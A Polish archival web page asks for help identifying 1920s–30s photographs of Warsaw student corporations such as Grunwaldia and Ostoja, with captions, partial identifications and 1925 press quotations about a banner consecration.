Trzy fotografie opatrzone dedykacjami, niewyraźnym podpisem (być może “Stefan Ginter”) i datą z początków czerwca 1925 r.

Powiększenie sztandaru wydaje się wskazywać na Korporację Grunwaldia.

Istotne byłoby ustalenie daty, okoliczności, miejsc zrobienia fotografii, jak także tożsamości choćby części widocznych na niej osób.

Korporacja Grunwaldja (?), Warszawa 1925 r. (?).

Korporacja Grunwaldja (?), Warszawa 1925 r. (?).

Korporacja Grunwaldja (?), Warszawa 1925 r. (?).

 

Uroczystości poświęcenia sztandaru Korporacji Grunwaldja, Warszawa 27 IV 1925 r., identyfikacja dnia 10 I 2009 r. dzięki pomocy Krzysztofa Adama Tyszki (K! Aquilonia).

Uroczystość poświęcenia sztandaru Grunwaldii miała się odbić echem w ówczesnej prasie. Między innymi napisano: “W poniedziałek, dnia 27 kwietnia br. ks. poseł M. Nowakowski, Opiekun K! Grunwaldia, dokonał w kościele P.P. Wizytek poświęcenia sztandaru tej korporacji. Rodzicami chrzestnymi sztandaru byli: p. Jadwiga Reutt, przełożona Gimnazjum Żeńskiego im. Plater-Zyberkówny oraz p. poseł dr Stanisław Głąbiński, filister Grunwaldii.” (Rzeczpospolita 1925, nr 127, z dnia 9 maja 1925 r.) oraz “Podczas Mszy Św. śpiewali na chórze pp. Łuszczewska, Skwarczewski i Kiepura, tenor opery stołecznej, członek korporacji.” (Warszawianka 1925, nr 117 z dnia 29 maja 1925 r.). Ówczesnym prezesem Grunwaldji był Antoni Dzik (cytaty i informacje za K. A. Tyszka).

 

Korporacja Grunwaldja (?), Warszawa 1925 r. (?).

15.2. Komers Korporacji Grundwaldja, Warszawa 1925 r.

Fotografia opatrzona podpisem “Komers warszawskiej Korporacji Grunwaldji w Warszawiance, Warszawa 1925 rok”. Trzymająca rapir, uśmiechnięta osoba to Henryk Zawadzki.

Istotne byłoby ustalenie dokładnej daty, miejsca zrobienia fotografii, jak także tożsamości choćby części pozostałych widocznych na niej osób.

_________________________________________________________________________________________

Ostoja, pierwszy z lewej Stefan Zgorzelski, mieszkanie pp. Gieranakowskich przy ul. Moniuszki 3 (6?), Warszawa maj 1924 r. (1925/26?).

21.2. Ostoja, 1924 r. (1925/26?).

Fotografia przedstawia grupę członków Ostoji w 1924 r. Istotne byłoby określenie tożsamości pozostałych osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

Komers Ostoji, od wewnętrznej strony stołu: 2. Jerzy Pilecki, 6. Stefan Zgorzelski, 7. Władysław Zgorzelski, Warszawa prawd. druga poł. lat 20-tych.

21.2. Ostoja, prawd. druga poł. lat 20-tych.

Fotografia przedstawia zapewne uroczystości rocznicowe (?) Ostoji, prawdopodobnie w drugiej połowie lat 20-tych. Istotne byłoby określenie tożsamości pozostałych osób na zdjęciu, jak także okoliczności i daty wykonania fotografii.

_________________________________________________________________________________________

Członek Maltanii, 1933 r.

22.1. Członek Maltanii.

Fotografia prawdopodobnie przedstawia członka Korporacji Maltania z Warszawy. Istotne byłoby określenie tożsamości osoby na zdjęciu.

_________________________________________________________________________________________

Członek Regii, 1927 r.

30.1. Członek Regii, 1927 r.

Fotografia przedstawia członka Regii. Istotne byłoby ustalenie tożsamości osoby na zdjęciu.

_________________________________________________________________________________________

Fotografia grupowa Korporacji Virtunia (?) z Warszawy.

30.1. Fotografia grupowa Korporacji Virtunia (?) z Warszawy.

Fotografia przedstawia grupę członków korporacji z Warszawy (w górym rzędzie szósty od lewej Stefan Chełmiński, siódmy Witold Modliński). Istotne byłoby potwierdzenie (ustalenie ?) nazwy tej korporacji, jak także daty i okoliczności wykonania fotografii oraz tożsamości osób na zdjęciu.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 17 VII 2010 r.
Ostatnia zmiana: 25 XI 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Warszawy, (na:) www.archiwumkorporacyjne.pl, stan 25 XI 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }